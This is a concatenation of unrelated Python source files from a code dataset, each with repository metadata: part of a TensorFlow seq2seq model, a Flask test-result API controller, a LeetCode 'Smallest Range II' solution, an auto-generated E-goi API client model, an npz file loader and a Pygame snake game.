(masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`.
Returns:
"""
if labels is not None:
labels = tf.where(
labels == self.config.pad_token_id,
tf.fill(shape_list(labels), tf.cast(-100, labels.dtype)),
labels,
)
use_cache = False
if decoder_input_ids is None:
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
outputs = self.model(
input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
encoder_outputs=encoder_outputs,
decoder_attention_mask=decoder_attention_mask,
decoder_position_ids=decoder_position_ids,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
lm_logits = self.model.shared(outputs[0], mode="linear")
lm_logits = lm_logits + self.final_logits_bias
masked_lm_loss = None if labels is None else self.hf_compute_loss(labels, lm_logits)
if not return_dict:
output = (lm_logits,) + outputs[1:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return TFSeq2SeqLMOutput(
loss=masked_lm_loss,
logits=lm_logits,
past_key_values=outputs.past_key_values, # index 1 of d outputs
decoder_hidden_states=outputs.decoder_hidden_states, # index 2 of d outputs
decoder_attentions=outputs.decoder_attentions, # index 3 of d outputs
cross_attentions=outputs.cross_attentions, # index 4 of d outputs
encoder_last_hidden_state=outputs.encoder_last_hidden_state, # index 0 of encoder outputs
encoder_hidden_states=outputs.encoder_hidden_states, # 1 of e out
encoder_attentions=outputs.encoder_attentions, # 2 of e out
)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartForConditionalGeneration.serving_output
def serving_output(self, output):
pkv = tf.tuple(output.past_key_values)[1] if self.config.use_cache else None
dec_hs = tf.convert_to_tensor(output.decoder_hidden_states) if self.config.output_hidden_states else None
dec_attns = tf.convert_to_tensor(output.decoder_attentions) if self.config.output_attentions else None
cross_attns = tf.convert_to_tensor(output.cross_attentions) if self.config.output_attentions else None
enc_hs = tf.convert_to_tensor(output.encoder_hidden_states) if self.config.output_hidden_states else None
enc_attns = tf.convert_to_tensor(output.encoder_attentions) if self.config.output_attentions else None
return TFSeq2SeqLMOutput(
logits=output.logits,
past_key_values=pkv,
decoder_hidden_states=dec_hs,
decoder_attentions=dec_attns,
cross_attentions=cross_attns,
encoder_last_hidden_state=output.encoder_last_hidden_state,
encoder_hidden_states=enc_hs,
encoder_attentions=enc_attns,
)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartForConditionalGeneration.prepare_inputs_for_generation
def prepare_inputs_for_generation(
self,
decoder_input_ids,
past=None,
attention_mask=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
use_cache=None,
encoder_outputs=None,
**kwargs
):
# cut decoder_input_ids if past is used
if past is not None:
decoder_input_ids = decoder_input_ids[:, -1:]
if decoder_attention_mask is not None: # xla
decoder_position_ids = tf.math.cumsum(decoder_attention_mask, axis=-1, exclusive=True)[:, -1:]
elif past is not None: # no xla + past
decoder_position_ids = past[0][0].shape[2]
else: # no xla + no past
decoder_position_ids = tf.range(decoder_input_ids.shape[1])
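        # Worked example added for clarity (assumed values, not from the original source): in the XLA
        # branch, a decoder_attention_mask of [[1, 1, 1, 1]] gives an exclusive cumsum of [[0, 1, 2, 3]],
        # and taking the last column yields [[3]] -- the position id of the token being generated.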
return {
"input_ids": None, # encoder_outputs is defined. input_ids not needed
"encoder_outputs": encoder_outputs,
"past_key_values": past,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"decoder_attention_mask": decoder_attention_mask,
"decoder_position_ids": decoder_position_ids,
"head_mask": head_mask,
"decoder_head_mask": decoder_head_mask,
"cross_attn_head_mask": cross_attn_head_mask,
"use_cache": use_cache, # change this to avoid caching (presumably for debugging)
}
def prepare_decoder_input_ids_from_labels(self, labels: tf.Tensor):
return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id)
@staticmethod
# Copied from transformers.models.bart.modeling_tf_bart.TFBartForConditionalGeneration._reorder_cache
def _reorder_cache(past, beam_idx):
reordered_past = ()
for layer_past in past:
# cached cross_attention states don't have to be reordered -> they are always the same
reordered_past += (
tuple(tf.gather(past_state, beam_idx, axis=0) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
def adjust_logits_during_generation(
self, logits, cur_len, max_length, forced_bos_token_id, forced_eos_token_id, **kwargs
):
"""Never predict pad_token_id. Predict </s> when max_length is reached."""
vocab_range = tf.constant(range(self.config.vocab_size))
logits = tf.where(vocab_range == self.config.pad_token_id, LARGE_NEGATIVE, logits)
if cur_len == 1 and forced_bos_token_id is not None:
vocab_range = tf.constant(range(self.config.vocab_size))
return tf.where(vocab_range != forced_bos_token_id, LARGE_NEGATIVE, logits)
elif cur_len == max_length - 1 and forced_eos_token_id is not None:
vocab_range = tf.constant(range(self.config.vocab_size))
return tf.where(vocab_range != forced_eos_token_id, LARGE_NEGATIVE, logits)
else:
return logits
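    # Example added for clarity (assumed ids, not from the original source): with forced_eos_token_id=0
    # and cur_len == max_length - 1, every vocabulary logit except index 0 is set to LARGE_NEGATIVE,
    # so the model is forced to emit </s> as the final token.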
| [
"[email protected]"
] | |
b874247bc7250254be315256308819b4f715e819 | 9153b0679889a64dd9a0dae12d9e3e22a749bc69 | /webserver/app/main/controller/testresult_controller.py | 369d8b4c5ba239aee147559fbc2453f66115012a | [
"MIT"
] | permissive | Remoterwls/Auto-Test-System | 9e0a6c96a5222a7374e5755c518d7a10bb96f6bd | e865758241beee3bd0c56a120f3986b0c4aa7253 | refs/heads/master | 2022-12-03T01:55:37.158529 | 2020-07-30T10:17:19 | 2020-07-30T10:17:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,394 | py | import json
import os
from datetime import date, datetime, timedelta, timezone
from dateutil import parser, tz
from pathlib import Path
from bson.errors import InvalidId
from bson.objectid import ObjectId
from flask import request, send_from_directory, url_for, current_app
from flask_restx import Resource
from mongoengine import DoesNotExist, ValidationError
from ..util.decorator import token_required, organization_team_required_by_args, organization_team_required_by_json
from ..util.get_path import get_test_results_root
from ..config import get_config
from ..model.database import QUEUE_PRIORITY_MAX, QUEUE_PRIORITY_MIN, Endpoint, Task, TestResult
from ..util.dto import TestResultDto
from ..util.response import response_message, ENOENT, EINVAL, SUCCESS, EPERM
api = TestResultDto.api
_test_report = TestResultDto.test_report
_record_test_result = TestResultDto.record_test_result
_test_result = TestResultDto.test_result
USERS_ROOT = Path(get_config().USERS_ROOT)
@api.route('/')
class TestResultRoot(Resource):
@token_required
@organization_team_required_by_args
@api.doc('get_task_report_list')
@api.param('page', description='The page number of the whole test report list')
@api.param('limit', description='The item number of a page')
@api.param('title', description='The test suite name')
@api.param('priority', description='The priority of the task')
@api.param('endpoint', description='The endpoint that runs the test')
@api.param('sort', default='-run_date', description='The sort field')
@api.param('start_date', description='The start date')
@api.param('end_date', description='The end date')
@api.marshal_list_with(_test_report)
def get(self, **kwargs):
"""Get the task report list"""
page = request.args.get('page', default=1)
limit = request.args.get('limit', default=10)
title = request.args.get('title', default=None)
priority = request.args.get('priority', default=None)
endpoint_uid = request.args.get('endpoint', default=None)
sort = request.args.get('sort', default='-run_date')
start_date = request.args.get('start_date', None)
end_date = request.args.get('end_date', None)
organization = kwargs['organization']
team = kwargs['team']
if start_date:
start_date = parser.parse(start_date)
if end_date is None:
end_date = datetime.now(timezone.utc)
else:
end_date = parser.parse(end_date)
if (start_date - end_date).days > 0:
                return response_message(EINVAL, 'start date {} is later than end date {}'.format(start_date, end_date)), 400
query = {'run_date__lte': end_date, 'run_date__gte': start_date, 'organization': organization}
else:
query = {'organization': organization}
if team:
query['team'] = team
page = int(page)
limit = int(limit)
if page <= 0 or limit <= 0:
            return response_message(EINVAL, 'Fields page and limit should be positive integers'), 400
if priority and priority != '' and priority.isdigit() and \
int(priority) >= QUEUE_PRIORITY_MIN and int(priority) <= QUEUE_PRIORITY_MAX:
query['priority'] = priority
        if title and title != '':
query['test_suite__contains'] = title
if endpoint_uid and endpoint_uid != '':
endpoint = Endpoint.objects(uid=endpoint_uid).first()
if not endpoint:
return response_message(EINVAL, 'Endpoint not found'), 400
query['endpoint_run'] = endpoint
try:
dirs = os.listdir(get_test_results_root(team=team, organization=organization))
except FileNotFoundError:
return {'items': [], 'total': 0}
ret = []
for d in dirs:
try:
ObjectId(d)
            except (InvalidId, ValidationError) as e:
current_app.logger.exception(e)
else:
ret.append(d)
all_tasks = Task.objects(id__in=ret, **query).order_by(sort)
ret = []
for t in all_tasks[(page - 1) * limit : page * limit]:
ret.append({
'id': str(t.id),
'test_suite': t.test_suite,
'testcases': t.testcases,
'comment': t.comment,
'priority': t.priority,
'run_date': t.run_date,
'tester': t.tester.name,
'status': t.status,
'variables': t.variables,
'endpoint_list': t.endpoint_list,
'parallelization': t.parallelization
})
return {'items': ret, 'total': all_tasks.count()}
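    # Illustrative request (hypothetical values; the actual URL prefix depends on how this namespace
    # is registered in the application):
    #   GET /testresults/?page=1&limit=10&title=smoke&sort=-run_date
    #   -> {"items": [...], "total": 42}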
# @token_required
@api.doc('record_the_test_case')
@api.expect(_record_test_result)
def post(self):
"""create the test result in the database for a task"""
data = request.json
if data is None:
return response_message(EINVAL, "Payload of the request is empty"), 400
task_id = data.get('task_id', None)
        if task_id is None:
return response_message(EINVAL, "Field task_id is required"), 400
task = Task.objects(pk=task_id).first()
if not task:
return response_message(ENOENT, "Task not found"), 404
test_case = data.get('test_case', None)
        if test_case is None:
return response_message(EINVAL, "Field test_case is required"), 400
test_result = TestResult()
test_result.test_case = test_case
test_result.task = task
test_result.test_site = task.endpoint_run.name
try:
test_result.save()
except ValidationError as e:
current_app.logger.exception(e)
return response_message(EINVAL, "Test result validation failed"), 400
task.test_results.append(test_result)
task.save()
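    # Example payload for the POST above (hypothetical values, added for illustration):
    #   {"task_id": "5f0c2a1b9d3e4a0012345678", "test_case": "login_should_succeed"}
    # creates a TestResult bound to the given task and appends it to task.test_results.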
@api.route('/<task_id>')
@api.param('task_id', 'id of the task for which to update the result')
class TestResultUpload(Resource):
# @token_required
@api.doc('update the test result')
@api.expect(_test_result)
def post(self, task_id):
"""
Update the test result for the test case of a test suite
Any items in the field more_result in the payload will be filled to the field more_result in the test result recorded in the database
"""
data = request.json
if data is None:
return response_message(EINVAL, "Payload of the request is empty"), 400
if isinstance(data, str):
data = json.loads(data)
task = Task.objects(pk=task_id).first()
if not task:
return response_message(ENOENT, "Task not found"), 404
if not task.test_results:
return response_message(ENOENT, "Test result not found"), 404
cur_test_result = task.test_results[-1]
for k, v in data.items():
            if k != 'more_result' and getattr(TestResult, k, None) is not None:
setattr(cur_test_result, k, v)
else:
cur_test_result.more_result[k] = v
try:
cur_test_result.save()
except ValidationError as e:
current_app.logger.exception(e)
return response_message(EPERM, "Test result validation failed"), 400
| [
"[email protected]"
] | |
06a3ccc9647df2d8be805513e54fa0479aa7d101 | 20674c17d815214bf66b75be686bb8a45c0f5914 | /version1/910_Smallest_Range_II.py | 3c29c134342ecfaaf96e139eb9e1f848e33f07ef | [] | no_license | moontree/leetcode | e7b670969fe20785b15aae82996875fd66de1b08 | f2bf9b13508cd01c8f383789569e55a438f77202 | refs/heads/master | 2021-05-20T20:36:45.615420 | 2020-04-02T09:15:26 | 2020-04-02T09:15:26 | 252,408,563 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,314 | py | """
Given an array A of integers,
for each integer A[i] we need to choose either x = -K or x = K,
and add x to A[i] (only once).
After this process, we have some array B.
Return the smallest possible difference between the maximum value of B and the minimum value of B.
Example 1:
Input:
A = [1], K = 0
Output:
0
Explanation:
B = [1]
Example 2:
Input:
A = [0,10], K = 2
Output:
6
Explanation:
B = [2,8]
Example 3:
Input:
A = [1,3,6], K = 3
Output:
3
Explanation:
B = [4,6,3]
Note:
1 <= A.length <= 10000
0 <= A[i] <= 10000
0 <= K <= 10000
"""
class Solution(object):
def smallestRangeII(self, A, K):
"""
:type A: List[int]
:type K: int
:rtype: int
"""
# in sorted A
# if A[i] + K, then A[i - 1] must + K
# if A[i] - K, then A[i + 1] must - K
A.sort()
res = float('inf')
if len(A) == 1:
return 0
for i in range(len(A)):
l = min(A[0] + K, A[i + 1] - K) if i < len(A) - 1 else A[0] + K
r = max(A[-1] - K, A[i] + K)
res = min(res, r - l)
return res
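# Worked example added for clarity (uses the third example below): A = [1, 3, 6], K = 3.
# After sorting, choosing +K for indices <= i and -K for the rest gives:
#   i = 0: l = min(1+3, 3-3) = 0, r = max(6-3, 1+3) = 4 -> diff 4
#   i = 1: l = min(1+3, 6-3) = 3, r = max(6-3, 3+3) = 6 -> diff 3
#   i = 2: l = 1+3 = 4,           r = max(6-3, 6+3) = 9 -> diff 5
# so the answer is 3.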
examples = [
{
"input": {
"A": [1],
"K": 0
},
"output": 0
}, {
"input": {
"A": [0, 10],
"K": 2
},
"output": 6
}, {
"input": {
"A": [1, 3, 6],
"K": 3
},
"output": 3
}, {
"input": {
"A": [2, 7, 2],
"K": 1
},
"output": 3
}, {
"input": {
"A": [7, 8, 8],
"K": 5
},
"output": 1
}, {
"input": {
"A": [4, 8, 2, 7, 2],
"K": 5
},
"output": 6
}, {
"input": {
"A": [7, 8, 8, 5, 2],
"K": 4
},
"output": 5
},
]
import time
if __name__ == '__main__':
solution = Solution()
for n in dir(solution):
if not n.startswith('__'):
func = getattr(solution, n)
print(func)
for example in examples:
            print('----------')
start = time.time()
v = func(**example['input'])
end = time.time()
            print(v, v == example['output'], end - start)
| [
"[email protected]"
] | |
53a36dfdacc99125a08b041494733bbc5773b5f3 | 60b1f668808de2b82c2fcb62b07b45bb165219f2 | /egoi-api/models/campaign_push_content_template.py | 5715e23678e0f22dc440f87b2c4e513c0561e029 | [] | no_license | andersonmiguel/Egoi | 6d37bf7a3a7555e764f7a6e792b3ef1c68fe8e20 | b5f59f9b33ea94e170f4e7e26c6a37a78d2874c2 | refs/heads/master | 2022-06-21T07:18:44.920786 | 2020-05-04T17:29:02 | 2020-05-04T17:29:02 | 261,250,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,703 | py | # coding: utf-8
"""
APIv3 (Beta)
# Introduction Just a quick peek!!! This is our new version of API. Remember, it is not stable yet!!! But we invite you play with it and give us your feedback ;) # Getting Started E-goi can be integrated with many environments and programming languages via our REST API. We've created a developer focused portal to give your organization a clear and quick overview of how to integrate with E-goi. The developer portal focuses on scenarios for integration and flow of events. We recommend familiarizing yourself with all of the content in the developer portal, before start using our rest API. The E-goi APIv3 is served over HTTPS. To ensure data privacy, unencrypted HTTP is not supported. Request data is passed to the API by POSTing JSON objects to the API endpoints with the appropriate parameters. BaseURL = api.egoiapp.com # RESTful Services This API supports 5 HTTP methods: * <b>GET</b>: The HTTP GET method is used to **read** (or retrieve) a representation of a resource. * <b>POST</b>: The POST verb is most-often utilized to **create** new resources. * <b>PATCH</b>: PATCH is used for **modify** capabilities. The PATCH request only needs to contain the changes to the resource, not the complete resource * <b>PUT</b>: PUT is most-often utilized for **update** capabilities, PUT-ing to a known resource URI with the request body containing the newly-updated representation of the original resource. * <b>DELETE</b>: DELETE is pretty easy to understand. It is used to **delete** a resource identified by a URI. # Authentication We use a custom authentication method, you will need a apikey that you can find in your account settings. Below you will see a curl example to get your account information: #!/bin/bash curl -X GET 'https://api.egoiapp.com/my-account' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' Here you can see a curl Post example with authentication: #!/bin/bash curl -X POST 'http://api.egoiapp.com/tags' \\ -H 'accept: application/json' \\ -H 'Apikey: <YOUR_APY_KEY>' \\ -H 'Content-Type: application/json' \\ -d '{`name`:`Your custom tag`,`color`:`#FFFFFF`}' # SDK Get started quickly with E-goi with our integration tools. Our SDK is a modern open source library that makes it easy to integrate your application with E-goi services. * <b><a href='https://github.com/E-goi/sdk-java'>Java</a></b> * <b><a href='https://github.com/E-goi/sdk-php'>PHP</a></b> * <b><a href='https://github.com/E-goi/sdk-python'>Python</a></b> <security-definitions/> # noqa: E501
The version of the OpenAPI document: 3.0.0-beta
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from egoi-api.configuration import Configuration
class CampaignPushContentTemplate(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'template_id': 'int'
}
attribute_map = {
'type': 'type',
'template_id': 'template_id'
}
discriminator_value_class_map = {
}
def __init__(self, type=None, template_id=None, local_vars_configuration=None): # noqa: E501
"""CampaignPushContentTemplate - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._template_id = None
self.discriminator = 'type'
self.type = type
self.template_id = template_id
@property
def type(self):
"""Gets the type of this CampaignPushContentTemplate. # noqa: E501
:return: The type of this CampaignPushContentTemplate. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this CampaignPushContentTemplate.
:param type: The type of this CampaignPushContentTemplate. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["template"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def template_id(self):
"""Gets the template_id of this CampaignPushContentTemplate. # noqa: E501
ID of the template for this campaign # noqa: E501
:return: The template_id of this CampaignPushContentTemplate. # noqa: E501
:rtype: int
"""
return self._template_id
@template_id.setter
def template_id(self, template_id):
"""Sets the template_id of this CampaignPushContentTemplate.
ID of the template for this campaign # noqa: E501
:param template_id: The template_id of this CampaignPushContentTemplate. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and template_id is None: # noqa: E501
raise ValueError("Invalid value for `template_id`, must not be `None`") # noqa: E501
self._template_id = template_id
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CampaignPushContentTemplate):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, CampaignPushContentTemplate):
return True
return self.to_dict() != other.to_dict()
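# ---------------------------------------------------------------------------
# Illustrative sketch (added, not generated code): the module docstring above
# documents the Apikey header scheme with curl; the same GET /my-account call
# with the third-party `requests` library would look roughly like this.  The
# key value and function name are placeholders, not part of the SDK.
# ---------------------------------------------------------------------------
def _example_get_my_account(api_key="<YOUR_API_KEY>"):  # pragma: no cover
    import requests
    return requests.get(
        "https://api.egoiapp.com/my-account",
        headers={"accept": "application/json", "Apikey": api_key},
    ).json()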
| [
"[email protected]"
] | |
a0756500f16eb446c0c1b5acdb3013ffd5fb367a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02675/s466664784.py | 78be685e40ac4a6f27ae611368839fa6f0052292 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | N = int(input())
judge = N%10
hon = [2,4,5,7,9]
pon = [0,1,6,8]
bon = [3]
if judge in hon:
print("hon")
elif judge in pon:
print("pon")
elif judge in bon:
print("bon") | [
"[email protected]"
] | |
b14c8bc236b026f60a14731df9d445ec1900f808 | 55d36c0d471b5799838330cab64229947f10c99c | /Snake_lib/worm.py | d76fd6210da79d34edc4f885085c215d5744f396 | [] | no_license | hammadhaleem/Snake-game | 6fb601201686068cd7129317d42b498de886b1df | 2553cdcde641f4658d985ac5c3709ad786a57143 | refs/heads/master | 2021-01-22T09:41:42.787725 | 2013-04-21T16:52:30 | 2013-04-21T16:52:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,474 | py | # WORM Class #
import pygame
from globalvar import *
class Worm(object):
def __init__(self,surface,x,y,len=50):
self.player_name=" "
self.x=x
self.y=y
self.lag=1
self.first_x=self.x
self.first_y=self.y
self.surface=surface
self.color=worm_color
self.len=len
self.body_list=[[self.x, self.y +i] for i in range (self.len)]
self.growing=len
self.dir_x=0*self.lag
self.dir_y=-1*self.lag
self.first_dir_x=0*self.lag
self.first_dir_y=-1*self.lag
self.store_dir_x=0*self.lag
self.store_dir_y=0*self.lag
self.joon=3
self.score=0
self.head_r=2
self.domborkhor=0
self.control_up=pygame.K_UP
self.control_right=pygame.K_RIGHT
self.control_down=pygame.K_DOWN
self.control_left=pygame.K_LEFT
self.nitrogen_key=pygame.K_RSHIFT
self.nitrogen_counter=2
self.game_over=False
def analize(self,event):
up=self.control_up
right=self.control_right
down=self.control_down
left=self.control_left
nit=self.nitrogen_key
if event.key == up :
if self.dir_y==1*self.lag:
return
self.dir_x = 0*self.lag
self.dir_y = -1*self.lag
elif event.key == down :
if self.dir_y==-1*self.lag:
return
self.dir_x = 0*self.lag
self.dir_y = 1*self.lag
elif event.key == left:
if self.dir_x==1*self.lag:
return
self.dir_x = -1*self.lag
self.dir_y = 0*self.lag
elif event.key == right :
if self.dir_x==-1*self.lag:
return
self.dir_x = 1*self.lag
self.dir_y = 0*self.lag
elif event.key==nit and self.nitrogen_counter>=1:
self.eat_nitrogen()
self.nitrogen_counter-=1
def eat(self):
self.growing +=growing_worm
def draw(self):
#pygame.draw.circle(self.surface,self.color, (self.body_list[0][0],self.body_list[0][1]),self.head_r+ 1)
for i in self.body_list:
# pygame.draw.rect(display,(255,0,0),(i[0],i[1],5,s5))
pygame.draw.circle(self.surface,self.color, (i[0],i[1]),self.head_r)
def erase(self):
self.joon-=1
self.score-=1
self.body_list=[]
self.x=self.first_x
self.y=self.first_y
self.dir_x=self.first_dir_x
self.dir_y=self.first_dir_y
## def eat_dombor(self):
##
## if self.domborkhor!=1:
## self.domborkhor=1
## self.score-=1
## self.len-=dombor_effect
## self.growing-=dombor_effect
## for i in range(dombor_effect):
## if len(self.body_list)>20:
## self.body_list.pop()
##
def move(self):
self.x += self.dir_x
self.y += self.dir_y
if self.x<=0:
self.x=width
if self.y<=0:
self.y=height
if self.x>=width+1:
self.x=0
if self.y>=height+1:
self.y=0
#if self.x<=-2 or self.y<=-2 or self.x>=width+1 or self.y>=height :
# self.erase()
if [self.x,self.y] in self.body_list:
self.erase()
self.body_list.insert(0, [self.x, self.y])
if (self.growing > self.len):
self.len += 1
if len(self.body_list) > self.len:
self.body_list.pop()
def check_to_accident(self,x,y):
if [x,y] in self.body_list:
return True
    def eat_nitrogen(self):
        # Restored from the commented-out version above it in the original:
        # analize() calls this when the nitrogen key is pressed, so leaving it
        # commented out raised AttributeError at runtime.
        self.store_dir_x=self.dir_x
        self.store_dir_y=self.dir_y
        self.dir_x*=5
        self.dir_y*=5
    def un_eat_nitrogen(self):
        self.dir_x=self.store_dir_x
        self.dir_y=self.store_dir_y
        self.store_dir_x,self.store_dir_y=0,0
class AIWorm(Worm):
def __init__(self,surface,x,y,len=50):
Worm.__init__(self,surface,x,y,len=50)
self.start_delay=False
self.counter=0
def analize(self,xekh,yekh,rival,alert,aitype):#dlay==delay
print aitype
if aitype==2:
print self.start_delay
if self.start_delay==True:
self.counter+=1
if self.start_delay==True and self.counter>=30:
self.counter=0
self.start_delay=False
#if time==a:
# print "hahahhahahhhahhhahahhh\n\n\n\n\n"
if self.start_delay==False:
for i in rival.body_list:
if i[0]==self.x and abs(i[1]-self.y)<alert and self.dir_y==-1:
self.start_delay=True
if xekh>=0:
self.dir_x=-1
self.dir_y=0
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if i[0]==self.x and abs(i[1]-self.y)<alert and self.dir_y==1:
self.start_delay=True
if xekh>=0:
self.dir_x=-1
self.dir_y=0
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if i[1]==self.y and abs(i[0]-self.x)<alert and self.dir_x==-1:
self.start_delay=True
if yekh>=0:
self.dir_x=0
self.dir_y=-1
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if i[1]==self.y and abs(i[0]-self.x)<alert and self.dir_x==1:
self.start_delay=True
if yekh>=0:
self.dir_x=0
self.dir_y=-1
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if xekh==0:
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if yekh>0:
self.dir_x=0
self.dir_y=-1
return
if yekh==0:
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if xekh>0:
self.dir_x=-1
self.dir_y=0
return
if xekh>0:
if self.dir_x!=1:
self.dir_x=-1
self.dir_y=0
return
if xekh<0:
if self.dir_x!=-1:
self.dir_x=1
self.dir_y=0
return
if yekh>0:
if self.dir_y!=1:
self.dir_x=0
self.dir_y=-1
return
if yekh<0:
if self.dir_y!=-1:
self.dir_x=0
self.dir_y=1
return
if aitype==1:
pass
if xekh==0:
if yekh<0:
self.dir_x=0
self.dir_y=1
return
if yekh>0:
self.dir_x=0
self.dir_y=-1
return
if yekh==0:
if xekh<0:
self.dir_x=1
self.dir_y=0
return
if xekh>0:
self.dir_x=-1
self.dir_y=0
return
if xekh>0:
if self.dir_x!=1:
self.dir_x=-1
self.dir_y=0
return
if xekh<0:
if self.dir_x!=-1:
self.dir_x=1
self.dir_y=0
return
if yekh>0:
if self.dir_y!=1:
self.dir_x=0
self.dir_y=-1
return
if yekh<0:
if self.dir_y!=-1:
self.dir_x=0
self.dir_y=1
return
| [
"[email protected]"
] | |
027b9caef0850dcdd1dc4783426b6900fa67eaee | 2e58532464f58b27de68297b0348f0c460448474 | /Assignment-7/How_to_Write_Match/main_3.py | c7984212e0a63d3735236561dff194507a3e9578 | [] | no_license | RidaATariq/ITMD_413 | 969a2ebe48746b3269493027daef666bd7a26997 | ee1676419e2a09ce4d52cfca3c3e02f00b24f74f | refs/heads/main | 2023-04-20T19:15:12.864852 | 2021-05-09T18:41:46 | 2021-05-09T18:41:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | import re
# pattern = re.compile(r'\d\d\d.\d\d\d.\d\d\d\d')
pattern = re.compile(r'\d{3}.\d{3}.\d{4}') # same pattern as above but number specifies the no. of /d
# matches = pattern.finditer(text_to_search)
# for match in matches:
# print(match)
with open('data.txt', 'r') as f:
contents = f.read()
matches = pattern.finditer(contents)
for match in matches:
print(match)
| [
"[email protected]"
] | |
bcbac824d74d96140a3d7c8bf90485d3a39c8eb8 | bf0aa689b92be1df24100e8581caab59a74e31db | /src/loaders/npzpck.py | c689dda4e06a1adf307df646cef07b6ad420aa1b | [
"MIT"
] | permissive | shmilee/gdpy3 | d7c689a70557534baa98595092cee0d737ea93cc | cdebb80dbb4a4d84ffa7115d8f18b5589fd40fb2 | refs/heads/master | 2023-08-19T22:42:40.305085 | 2023-08-15T02:11:15 | 2023-08-15T03:11:04 | 88,051,033 | 9 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,405 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 shmilee
'''
Contains Npz pickled file loader class.
'''
import numpy
import zipfile
from ..glogger import getGLogger
from ..utils import inherit_docstring
from .base import BasePckLoader, _pck_copydoc_func
__all__ = ['NpzPckLoader']
log = getGLogger('L')
@inherit_docstring((BasePckLoader,), _pck_copydoc_func, template=None)
class NpzPckLoader(BasePckLoader):
'''
Load pickled data from ``.npz`` file. Return a dictionary-like object.
Attributes
{Attributes}
Parameters
{Parameters}
Notes
-----
Q: How to read data from .npz file?
A: npzfile[datakey]
>>> npzfile = numpy.load('/tmp/test.npz')
>>> datakey = 'group/key'
>>> npzfile[datakey]
'''
__slots__ = []
loader_type = '.npz'
def _special_check_path(self):
if zipfile.is_zipfile(self.path):
return True
else:
log.error("'%s' is not a ZIP file!" % self.path)
return False
def _special_open(self):
return numpy.load(self.path, allow_pickle=True)
def _special_close(self, pathobj):
pathobj.close()
def _special_getkeys(self, pathobj):
return sorted(dict.fromkeys(pathobj.files))
def _special_get(self, pathobj, key):
value = pathobj[key]
if value.size == 1:
value = value.item()
return value
| [
"[email protected]"
] | |
